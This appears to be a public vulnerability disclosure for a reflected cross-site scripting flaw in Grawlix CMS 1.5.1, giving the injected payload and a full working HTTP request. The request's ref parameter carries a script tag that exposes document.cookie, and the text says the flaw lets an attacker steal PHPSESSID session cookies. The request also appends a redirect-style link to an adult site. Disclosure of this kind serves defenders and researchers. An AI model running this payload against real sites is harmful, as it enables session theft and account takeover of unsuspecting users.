Grawlix 1.5.1 Cross Site Scripting

`## Title: grawlix-1.5.1 XSS-Reflected  
## Author: nu11secur1ty  
## Date: 08/29/2023  
## Vendor: https://getgrawlix.com/  
## Software:  
## Reference: https://portswigger.net/web-security/cross-site-scripting  
  
## Description:  
The value of the ref request parameter is copied into the value of an  
HTML tag attribute which is encapsulated in double quotation marks.  
The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submitted  
in the ref parameter. This input was echoed unmodified in the  
application's response. The attacker can steal PHPSESSID cookie and  
can trick the victim into visiting his or some other dangerous URL  
address.  
  
STATUS: HIGH-Vulnerability  
  
[+]Exploit:  
```POST  
GET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=Login  
HTTP/1.1  
Host: localhost  
sec-ch-ua:  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2  
Connection: close  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)  
  
## Time spend:  
00:27:00  
  
`